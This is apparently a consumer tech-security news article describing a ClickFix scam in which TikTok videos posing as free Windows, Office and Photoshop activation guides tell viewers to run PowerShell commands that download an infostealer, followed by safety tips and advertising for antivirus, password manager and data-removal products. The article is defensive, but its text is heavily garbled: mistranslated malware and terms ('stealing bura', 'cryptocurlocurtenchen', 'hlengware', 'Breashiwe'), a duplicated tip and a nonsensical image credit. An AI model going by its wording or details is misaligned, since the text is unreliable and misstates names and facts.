– For todayNow you can listen to FOX news headlines!
Cybercriminals also turn Tiktok into a trap for unscrupulous users. In this case, they disguise malicious downloads as free activation guides for popular software such as Windows, Microsoft 365, Photoshop and NetHlix for Netflix and Premium.
Security expert Xavier Metens first saw the campaign, confirming that a similar version of Sunga was seen earlier this year. According to Bleepingcomputer, these fake tiktok videos show short PowerShell commands and teach viewers to run them as administrators to “activate” their programs.
In fact, those instructions connect to a malicious website and pull malware known as stealing aura known as stealing bura, which siphons dull stored passwords, cookies, cryptocurlocurtenchen wallets and authentication tokens from the victim’s computer.
Sign up for my free cyberGuy newsletter
Get my best tech tips, emergency security alerts, and special deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – Free when you join mine CyberGuy.com newsletter.
YouTube + YouTube videos deliver malware disguised as free software
Cybercriminals use fake tiktok videos to trick users into downloading malware disguised as free tutorials. (Kurt “cyberguy” Knutsson)
How Tiktok Scam works
This campaign uses what experts call a Clickfix attack. It is a social engineering tactic that makes victims feel they are following legitimate technical orders. The instructions seem quick and easy: use one short command and get instant access to the premium software.
But instead of running anything, the powellshell command connects to a remote domain called SLMGR[.]Win, which downloads negative documents from cloud-hosted pages. The main file, Updater.exe, is a variant of the AURA Swer malware. Once inside the system, it hunts down your credentials and sends them back to the attacker.
Another file, source.exe, uses Microsoft’s C# Compiler to load the code directly into memory, making it more difficult to find. The purpose of this additional upload is not fully known yet, but the pattern follows previous malware used to steal crypto and deliver hlengware.
Meta Account Suspension Scam Hides FileFix malware
Those short “activation” objects secretly connect to malicious servers that host info-stealing malware such as Aura Steal. (Kurt “cyberguy” Knutsson)
How to stay safe from Tiktok Malware Scare
Although these scams look convincing, you can avoid becoming a victim by taking proper precautions.
1) Avoid shortcuts
Never copy or use PowerShell commands from Tiktok videos or random websites. When something promises free access to premium software, it can be a trap.
2) Use reliable sources
Always download or run the software directly from the official website or through official app stores.
3) keep security tools updated
Outdated antiviruses or browsers cannot detect the latest threats. Update your software regularly for protection.
4) Use strong antivirus software
Install robust antivirus software that provides real-time scanning and protection against Trojans, phishing and phishing attempts.
The best way to protect yourself from malicious links that contain malware, possibly accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransom scams, keeping your information and digital assets safe.
Find my pick of the best antivirus winners for antivirus protection for your Windows, Mac, Android and IOS devices at CyberGuy.com
5) Sign up for a data removal service
If your private data ends up on the dark web, data deletion or resource monitoring can inform you and help remove sensitive information.
While no tool can guarantee complete removal of your data from the Internet, a data removal tool is definitely a good choice. They are not cheap, and so is your privacy. These services do all the work for you by actively monitoring and systematically removing your information from hundreds of websites. It is what gives you peace of mind and has proven to be the most effective way to erase your private data from the Internet. By limiting the information available, you reduce the risk of scammers rejecting data from Breashiwe with information you can find on the dark web, making it difficult for them to look for you.
Check out my top picks for data removal services and get a free scan to find out if your data has already appeared on the web by visiting CyberGuy.com
Get a free Scan to find out if your information has already appeared on the web: CyberGuy.com
6) Reset credentials
If you’ve ever followed suspicious instructions or entered credentials after watching a “free trial” video, reset all your passwords immediately.
7) Reset passwords
If you’ve ever followed suspicious instructions or entered credentials after watching a “free trial” video, reset all your passwords immediately. Start with your email, financial and social media. Use unique passwords for each site. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse.
Next, check if your email was displayed in the previous checkout. Our #1 password manager (see CyberGuy.com) Select includes a built-in scanner that checks if your email address or passwords appear in known leaks. If you find a game, immediately change any reused passwords and secure those accounts with new, different credentials.
Check out the best discount password managers reviewed in 2025 at CyberGuy.com
8) Enable multi-factor authentication
Add an extra layer of security by unlocking Multi-Factor Authentication where possible. Even if your passwords are stolen, attackers won’t be able to log in without your authentication.
If you followed suspicious steps, change your passwords, enable two-factor authentication, and stay alert for future SCAMS. (Pet Pictures)
Kurt’s Key Takeaways
Tiktok’s Global Faint makes it a prime indicator of scams like this. What seems like a useful hack can end up costing you your security, your money, and your peace of mind. Always be careful, trust only verified sources and remember that there is no such thing as a free activation shortcut.
Click here to download the FOX News app
Is Tiktok doing enough to protect its users from scams like this? Let us know by writing to us CyberGuy.com
Sign up for my free cyberGuy newsletter
Get my best tech tips, emergency security alerts, and special deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – Free when you join mine CyberGuy.com newsletter.
Copyright 2025 cyberguy.com. All rights reserved.
